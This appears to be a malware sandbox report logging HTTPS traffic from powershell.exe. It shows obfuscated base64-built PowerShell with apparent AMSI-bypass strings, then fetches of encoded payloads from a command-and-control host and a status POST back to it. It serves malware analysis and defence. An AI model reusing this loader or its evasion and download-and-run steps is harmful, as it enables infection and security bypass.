                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KU5qvM%2Fe6qeYbiP3VAhi%2FPJc0p5mDuqzfLdcHsOXIdgfakp1UwrJ5dUik4HuQ6mJiq%2BEEJdEBpJz%2FqpwQNPxRsw8QP74zawsM1FKxs3jUPHXla1pQaB9NLDH8bTqzT35nojDt958Recq"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44709&sent=23356&recv=12122&lost=0&retrans=0&sent_bytes=32458717&recv_bytes=134166&delivery_rate=57212301&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1c2a8cac3f3-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102133&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=780&delivery_rate=37473&cwnd=252&unsent_bytes=0&cid=668fc5e5970298af&ts=825&x=0"
                                                                                      2024-11-08 09:45:44 UTC379INData Raw: 24 63 79 6b 75 72 67 72 6c 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 55 5a 30 52 6d 4a 75 57 6e 42 6a 62 54 6c 31 59 6c 64 57 64 57 52 47 4d 44 5a 50 62 45 4a 35 59 6a 4a 4f 62 47 4d 7a 54 6e 5a 6a 61 30 35 32 5a 46 63 31 4d 45 39 33 4d 45 74 4b 52 31 46 6e 55 46 4e 42 62 31 49 79 56 6a 42 4d 56 6b 4a 35 59 6a 4a 4f 62 47 4d 7a 54 57 64 6d 51 30 4a 4f 57 6c 64 47 65 6d 52 59 53 6d 78 4d 56 54 6c 70 59 57 31 57 61 6d 52 44 61 33 56 52 4d 6a 6b 78 59 6d 35 52 4e 30 52 52 62 32 74 61 55 30 45 35 53 55 5a 30 56 47 56 59 54 6a 42 61 56 7a 42 31 56 6c 68 4b 63 46 68 55 62
                                                                                      Data Ascii: $cykurgrl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SUZ0RmJuWnBjbTl1YldWdWRGMDZPbEJ5YjJObGMzTnZja052ZFc1ME93MEtKR1FnUFNBb1IyVjBMVkJ5YjJObGMzTWdmQ0JOWldGemRYSmxMVTlpYW1WamRDa3VRMjkxYm5RN0RRb2taU0E5SUZ0VGVYTjBaVzB1VlhKcFhUb
                                                                                      2024-11-08 09:45:44 UTC1369INData Raw: 30 39 58 57 6d 6c 4e 65 6d 64 33 54 47 31 4f 64 6d 4a 54 4f 57 31 68 56 33 68 73 54 58 6b 34 65 45 31 55 61 47 6c 4e 52 30 35 71 57 6d 70 5a 65 55 35 55 61 47 31 5a 4d 6c 45 30 54 6c 52 57 62 46 6c 55 54 6d 78 4f 52 45 35 74 54 30 52 4a 65 46 6c 36 55 58 70 4e 52 45 6c 34 54 6c 52 42 4d 55 31 74 57 6d 6c 4e 4d 6c 5a 70 54 31 64 57 61 6c 6c 55 56 58 64 4f 61 6c 45 31 54 31 52 53 62 55 35 58 54 58 68 61 56 45 30 78 54 6c 52 4a 4e 55 39 45 54 54 52 61 52 45 30 7a 57 6c 64 4a 4e 46 6c 74 53 6d 70 4f 52 30 35 6f 57 56 64 4b 61 45 30 79 55 54 52 4f 61 6b 6c 36 57 6c 52 4a 65 46 70 74 54 6d 74 50 52 30 6c 33 54 6c 52 5a 4d 55 39 45 53 6d 78 50 52 46 5a 71 54 31 52 61 61 55 39 55 59 7a 4a 61 61 6d 64 34 57 56 52 61 61 6c 70 45 61 47 70 61 56 31 70 73 54 6c 64 4a
                                                                                      Data Ascii: 09XWmlNemd3TG1OdmJTOW1hV3hsTXk4eE1UaGlNR05qWmpZeU5UaG1ZMlE0TlRWbFlUTmxORE5tT0RJeFl6UXpNREl4TlRBMU1tWmlNMlZpT1dWallUVXdOalE1T1RSbU5XTXhaVE0xTlRJNU9ETTRaRE0zWldJNFltSmpOR05oWVdKaE0yUTROakl6WlRJeFptTmtPR0l3TlRZMU9ESmxPRFZqT1RaaU9UYzJaamd4WVRaalpEaGpaV1psTldJ
                                                                                      2024-11-08 09:45:44 UTC1369INData Raw: 4d 78 57 47 4a 58 62 46 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 4e 57 68 69 56 31 5a 36 59 30 64 47 61 6c 70 54 51 57 6c 6a 62 54 6c 32 5a 45 5a 34 56 46 70 58 54 6a 46 6a 62 57 77 77 5a 56 56 4f 62 47 4a 75 55 6d 78 6a 61 6b 6c 70 53 55 4d 78 55 6d 52 58 56 6e 6c 6c 55 30 46 70 56 54 42 57 54 56 4a 56 54 6c 56 4a 51 32 39 6e 55 6d 78 4b 55 46 52 54 51 6b 4a 69 62 6c 4a 77 5a 47 31 73 65 57 52 59 54 6c 46 6a 62 54 6c 72 5a 46 64 4f 4d 45 6c 70 51 6a 68 4a 52 6b 35 73 59 6b 64 57 61 6d 52 44 4d 56 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 56 6a 52 6a 52 30 5a 31 57 6b 5a 43 65 57 49 7a 51 6d 78 6a 62 6c 49 31 53 55 64 53 63 47 4d 7a 51 6e 4e 5a 57 47 78 50 57 56 63 78 62 45 74 54 51 58 52 68 62 54 6c 77 59 6d 6c 42 61 55 78 44 53 58 42 50 65 55 4a 77 57
                                                                                      Data Ascii: MxWGJXbFBZbXBsWTNRZ0xVNWhiV1Z6Y0dGalpTQWljbTl2ZEZ4VFpXTjFjbWwwZVVObGJuUmxjaklpSUMxUmRXVnllU0FpVTBWTVJVTlVJQ29nUmxKUFRTQkJiblJwZG1seWRYTlFjbTlrZFdOMElpQjhJRk5sYkdWamRDMVBZbXBsWTNRZ0xVVjRjR0Z1WkZCeWIzQmxjblI1SUdScGMzQnNZWGxPWVcxbEtTQXRhbTlwYmlBaUxDSXBPeUJwW
                                                                                      2024-11-08 09:45:44 UTC1369INData Raw: 63 47 4a 71 54 58 6c 4a 53 48 4e 6e 56 7a 42 53 63 32 4a 46 62 48 52 6a 52 7a 6c 35 5a 45 4e 6e 61 57 52 59 54 6d 78 6a 61 6b 31 35 54 47 31 53 63 32 4a 44 53 58 42 59 55 30 4a 33 5a 46 64 4b 63 32 46 58 54 57 64 6a 4d 31 4a 6f 5a 45 64 73 61 6b 6c 48 56 6a 52 6b 52 31 5a 35 59 6d 6c 43 63 47 4a 75 55 57 64 56 4d 6d 68 32 5a 44 46 6b 63 47 4a 74 55 6e 59 3d 22 29 29 3b 0a 24 66 63 66 79 64 6a 6e 6a 63 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 79 78 54 64 47 46 30 61 57 4d 3d 22 29 29 3b 0a 24 79 7a 73 6a 77 6b 7a 67 6f 6f 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45
                                                                                      Data Ascii: cGJqTXlJSHNnVzBSc2JFbHRjRzl5ZENnaWRYTmxjak15TG1Sc2JDSXBYU0J3ZFdKc2FXTWdjM1JoZEdsaklHVjRkR1Z5YmlCcGJuUWdVMmh2ZDFkcGJtUnY="));$fcfydjnjc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YyxTdGF0aWM="));$yzsjwkzgoo=[System.Text.E
                                                                                      2024-11-08 09:45:44 UTC516INData Raw: 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 56 74 4c 6b 52 70 59 57 64 75 62 33 4e 30 61 51 3d 3d 22 29 29 3b 0a 24 65 61 74 62 7a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 64 47 56 74 4c 6b 4e 76 63 6d 55 3d 22 29 29 3b 0a 24 6b 62 79 75 69 78 6a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 22 29 29 3b 0a 24 66 65 73 64
                                                                                      Data Ascii: onvert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aQ=="));$eatbz=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLkNvcmU="));$kbyuixj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));$fesd
                                                                                      2024-11-08 09:45:44 UTC1369INData Raw: 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 58 4e 70 53 57 35 70 64 45 5a 68 61 57 78 6c 5a 41 3d 3d 22 29 29 3b 0a 24 64 6d 64 71 63 74 65 77 61 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 51 3d 3d 22 29 29 3b 0a 24 7a 70 75 66 68 78 74 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 57 35 68 5a 32 56 74 5a 57 35 30 4c 6b 46 31 64 47 39 74 59 58 52 70 62 32 34
                                                                                      Data Ascii: t]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));$dmdqctewa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));$zpufhxt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW5hZ2VtZW50LkF1dG9tYXRpb24
                                                                                      2024-11-08 09:45:44 UTC46INData Raw: 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 78 78 61 71 76 70 74 76 79 20 2b 20 24 63 79 6b 75 72 67 72 6c 29 29 29 29 3b 0a
                                                                                      Data Ascii: FromBase64String(($xxaqvptvy + $cykurgrl))));


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.11.3049752172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:46 UTC374OUTGET /file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529838d37eb8bbc4caaba3d8623e21fcd8b056582e85c96b976f81a6cd8cefe5b84009c23e8fce5f3fc908c3b0c8f1f8b1f651fed32fb24db08cc428e6823d1046e/Windows%20Defender/16/16/user/208 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:45:47 UTC1062INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:46 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2882
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hkPfr51IZxCeOnqU3aUHjI4jJ4nRdYX%2FkpYPNM%2BoxtXWVJ%2FJOTNJtnphlhy3kZ8r0KezFP1LohYEwnzbRWIe5phOaGAePdcEMYjJzKeiVdGohmK6wPmvVlUYjxc5LE5rAfM9ApmEsNU9"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=30438&sent=23362&recv=12126&lost=0&retrans=0&sent_bytes=32465918&recv_bytes=135181&delivery_rate=57212301&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1d13ce8c34a-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102283&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1012&delivery_rate=37478&cwnd=249&unsent_bytes=0&cid=4856a17feb889b4f&ts=815&x=0"
                                                                                      2024-11-08 09:45:47 UTC307INData Raw: 25 6a 79 60 74 77 6c 74 74 64 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 54 50 76 5b 31 71 48 56 6c 69 68 52 47 5b 72 55 32 62 76 52 31 6d 45 50 56 65 4b 50 30 48 79 58 33 30 73 5b 30 43 55 50 56 6d 69 52 47 48 76 58 31 69 4f 4f 6a 79 34 4e 55 47 6d 56 47 47 35 58 6c 71 6e 60 30 71 59 54 55 57 60 63 54 6d 37 55 31 53 43 65 57 6a 78 4e 59 53 4c 4c 6d 44 7b 55 6d 53 47 64 54 30 37 52 55 47 4f 4c 6d 5b 72 55 30 53 73 64 44 34 54 56 55 43 4f 53 30 57 34 56 6a 53 4e 63 54 34 75 57 55 57 60 57 44 6a 31 56 57 53 6e 60 54 30 44 57 6c 75 60 57 47 57 37 55 6c 71 47 4c 44 34 59
                                                                                      Data Ascii: %jy`twlttd<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RTPv[1qHVlihRG[rU2bvR1mEPVeKP0HyX30s[0CUPVmiRGHvX1iOOjy4NUGmVGG5Xlqn`0qYTUW`cTm7U1SCeWjxNYSLLmD{UmSGdT07RUGOLm[rU0SsdD4TVUCOS0W4VjSNcT4uWUW`WDj1VWSn`T0DWlu`WGW7UlqGLD4Y
                                                                                      2024-11-08 09:45:47 UTC1369INData Raw: 57 46 4f 32 55 6f 71 4e 60 6d 6d 37 52 59 69 60 53 47 57 37 55 31 53 4f 64 54 34 54 53 6c 69 60 53 47 6d 35 56 56 30 60 60 6a 34 34 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 53 48 52 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 6d 68 4c 6d 48 30 52 54 50 76 5b 31 71 49 64 49 5b 60 4c 45 47 72 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 52 49 65 6f 54 55 48 34 65 56 53 75 57 6f 6d 6a 53 6d 4b 33 55 47 57 76 64 6c 48 78 4f 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 52 6c 4b 74 56 6f 5b 69 4c 6d 57 31 57 6b 4b 56 60 57 57 75 57 6f 69 6a 57 30 5b 37 5b 44 4f 43 65 47 5b 58 52 6f 43 4b 50 30 48 79 58 33 30 73 5b 31 79 57 4c 56 79
                                                                                      Data Ascii: WFO2UoqN`mm7RYi`SGW7U1SOdT4TSli`SGm5VV0``j44RUeDTV8oRTOC[3SHRkWDTV8oRTOC[1mEPVeKRIONP3mC[1mEPVeKP1GoRTOC[1mETlmhLmH0RTPv[1qIdI[`LEGrX{ON`GnxWoqKRIeoTUH4eVSuWomjSmK3UGWvdlHxOEeDTV8oRTOC[1mEPVeKP1GoRTOBRlKtVo[iLmW1WkKV`WWuWoijW0[7[DOCeG[XRoCKP0HyX30s[1yWLVy
                                                                                      2024-11-08 09:45:47 UTC1206INData Raw: 65 54 38 49 54 6c 79 60 53 46 79 75 56 56 71 4f 4f 44 30 45 4f 56 71 68 4c 6b 43 33 56 6c 30 72 62 30 71 54 52 59 5b 51 57 47 47 35 56 57 53 6b 4c 57 6d 70 52 6c 6d 51 53 30 4b 73 55 6a 65 53 4c 6a 30 70 60 32 69 51 53 47 6d 34 55 6a 65 4f 4c 54 35 78 52 6c 75 4e 53 46 4c 31 56 56 71 56 60 44 30 54 52 6c 75 4f 53 44 71 71 55 30 65 46 63 54 38 54 50 55 47 5b 57 31 31 30 55 6a 53 57 4f 54 30 37 52 6c 71 5b 60 6a 71 6e 56 6c 71 46 60 6d 6a 78 54 59 65 4f 64 6a 6d 37 55 54 65 53 65 31 38 54 58 7b 47 51 57 30 57 34 55 57 65 5b 64 6d 71 70 60 46 71 4e 53 30 6a 76 55 30 65 46 60 30 71 54 50 55 57 4f 64 6d 54 79 55 54 53 46 60 44 38 44 5b 46 75 4e 57 47 6d 37 55 31 53 57 4c 54 34 44 52 55 57 51 57 47 71 71 55 6a 53 43 64 6a 31 78 52 6c 75 51 53 30 4b 6e 56 6a 65
                                                                                      Data Ascii: eT8ITly`SFyuVVqOOD0EOVqhLkC3Vl0rb0qTRY[QWGG5VWSkLWmpRlmQS0KsUjeSLj0p`2iQSGm4UjeOLT5xRluNSFL1VVqV`D0TRluOSDqqU0eFcT8TPUG[W110UjSWOT07Rlq[`jqnVlqF`mjxTYeOdjm7UTeSe18TX{GQW0W4UWe[dmqp`FqNS0jvU0eF`0qTPUWOdmTyUTSF`D8D[FuNWGm7U1SWLT4DRUWQWGqqUjSCdj1xRluQS0KnVje


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.11.3049753172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:47 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee7073cc21d5383251ad61bfc7 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 308
                                                                                      2024-11-08 09:45:47 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 39 34 31 61 37 35 62 32 62 38 64 64 34 64 36 32 39 31 38 36 32 34 63 35 37 62 64 34 37 38 62 35 61 31 32 64 30 32 62 39 61 66 39 30 35 61 63 39 34 35 39 33 32 63 62 32 61 66 31 63 63 64 30 33 32 33 30 64 30 39 37 35 39 65 32 31 66 33 66 38 63 34 66 34 39 61 64 65 30 39 33 35 35 30 31 61 38 37 64 35 36 33 38 35 35 34 32 39 39 36 62 34 30 33 33 62 64 38 64 61 64 62 61 35 33 34 63 36 66 33 30 63 38 37 32 38 39 61 38 31 62 64 33 30 61 34 39 32 30 66 38 66 65 62 63 35 32 35 36 30 37 32 36 38 37 66 35 63 32 66 63 33 34 36 39 36 61 35 37 31 32 32 33 31 62 62 61 63 66 62 66 32 31 38 61 35
                                                                                      Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5
                                                                                      2024-11-08 09:45:48 UTC946INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:48 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vU03vw53X7kYGf7nctKEiEcGySkVQUhxUU4OYzx9VBG%2F4Rc7NHYW6jaRA92sNykuMp9foU79sQF%2FTPofceCnpkbWWKAPFNtTY55ylQdkqvZon%2FkqrV2mWmAM3tsamuHnShYdbzdw4c6r"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=27234&sent=23370&recv=12133&lost=0&retrans=0&sent_bytes=32470414&recv_bytes=137524&delivery_rate=57212301&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1d85dbe0f81-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102336&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1258&delivery_rate=37443&cwnd=248&unsent_bytes=0&cid=14493c7ba7a2bafe&ts=812&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.11.3049754172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:48 UTC370OUTGET /file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5274b2e64710df2467bce4536ee56 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:45:49 UTC1064INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:49 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2884
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgodWOT2AOJfIqVRH0Wa7iYavU2bePXu2hrjAYL9uzZ2VarBP0kylQ7ew5Kf0nCDsyLfuAHqyT2iBYBymAMwTi9MtuxNxPfo8aVBjMcIK%2B%2Fh1Whp157d78AORn%2BxiHld9%2F608ZlTkZKv"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=30421&sent=23372&recv=12135&lost=0&retrans=0&sent_bytes=32471167&recv_bytes=138530&delivery_rate=57212301&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1deefab7291-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102492&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=37330&cwnd=252&unsent_bytes=0&cid=e73fe025af69cde8&ts=805&x=0"
                                                                                      2024-11-08 09:45:49 UTC305INData Raw: 25 70 6a 6d 79 66 62 69 78 6d 60 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 6c 30 57 4c 6d 71 54 60 32 65 5b 64 6d 4b 71 56 6c 71 6f 4c 6a 30 49 53 59 69 4e 57 47 4b 70 55 31 65 60 60 44 30 59 56 55 57 5b 64 6d 6d 37 55 54 53 6b 64 54 34 59 55 59 65 5b 64 6a 30 35 55 55 4b 46 60 57 6d 37 57 55 53 4f 57 47 5b 73 55 57 65 56 63 44 30 44 60 7b 4b 4e 57 47 44 76 56 56 71 47 65 31 30 70 57 6c 69 4e 64 6c 72 79 56 6d 65 56 60 31 30 54 55 55 4b 51 57 46 69 71 55 6a 65 53 4c 44 30 44 50 59 71 4f 64 6c 53 71 56 56 30 47 64 44 38 44 52 6c 6d 4f 60 6c 69 72 56 6d 53 6a 60 47 71
                                                                                      Data Ascii: %pjmyfbixm`<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Ul0WLmqT`2e[dmKqVlqoLj0ISYiNWGKpU1e``D0YVUW[dmm7UTSkdT4YUYe[dj05UUKF`Wm7WUSOWG[sUWeVcD0D`{KNWGDvVVqGe10pWliNdlryVmeV`10TUUKQWFiqUjeSLD0DPYqOdlSqVV0GdD8DRlmO`lirVmSj`Gq
                                                                                      2024-11-08 09:45:49 UTC1369INData Raw: 55 47 4f 57 46 4c 79 56 6d 65 56 60 6a 34 54 52 55 4f 4f 53 44 31 76 56 6d 53 5b 4c 57 71 44 55 55 43 4f 53 46 62 78 55 30 53 4e 60 31 30 54 57 55 57 4e 60 6a 47 34 55 6c 71 72 60 31 34 49 56 55 43 5b 57 30 47 37 55 6d 53 4e 60 6a 35 78 57 6c 69 4e 57 44 30 71 55 32 62 76 52 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 50 76 5b 31 30 54 50 59 65 51 65 7b 43 4d 53 47 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62 46 48 78 4f 46 65 57 4c 6d 5b 30 56 6a 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 31 65 46 64 57 6d 59 4c 46 38 4b 53 6f 53 53 57 55 40 34 60 56 47 75 57 6c 71 6a 53 6b 43 6f 52 6a 65 35 65 6d 6e 76 4c 59 71 60 64 54 47 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 65 6c 4b 74 56 6c 79 6b 63 6d 47 6f 56 56 31 34 60 33 57 55
                                                                                      Data Ascii: UGOWFLyVmeV`j4TRUOOSD1vVmS[LWqDUUCOSFbxU0SN`10TWUWN`jG4Ulqr`14IVUC[W0G7UmSN`j5xWliNWD0qU2bvR1qIUo[jW{TvRTPv[10TPYeQe{CMSGGwUjOoLDu`cm[0VUORbFHxOFeWLm[0VjOBO1SSc3eKP1GoX1eFdWmYLF8KSoSSWU@4`VGuWlqjSkCoRje5emnvLYq`dTGvSGGwUjOqPVeKP1GpRTWNelKtVlykcmGoVV14`3WU
                                                                                      2024-11-08 09:45:49 UTC1210INData Raw: 4f 43 5b 31 6d 43 4c 44 75 6c 54 55 43 4d 53 47 47 76 4c 33 47 49 63 49 4f 60 54 33 65 73 56 55 48 34 4c 56 4b 74 54 56 65 4c 57 33 50 76 52 54 53 43 62 44 53 53 62 45 65 44 54 56 38 4a 53 47 47 77 52 6c 53 48 52 6b 57 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 56 6d 62 30 60 31 6d 45 52 6c 6d 60 57 33 53 76 58 6c 6d 42 60 33 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4f 43 60 33 53 58 52 6f 43 4b 60 6f 4f 4e 50 33 65 73 52 6a 71 49 55 6f 5b 68 63 6d 4b 72 58 6c 34 53 5b 30 43 55 50 6a 71 68 63 6d 71 33 58 55 4b 57 65 47 58 78 57 6c 6d 57 63 57 5b 35 5b 47 65 56 64 6c 53 45 50 59 53 56 56 44 71 76 52 54 4f 52 4c 56 4f 75 60 33 65 4c 57 6d 5b 37 56 6d 57 4a 60 46 4c 78 63 46 71 57 53 31 5b 34 58 7b 4b 72 65 57 71 37 62 31 34 45 60 54 47 6f 52
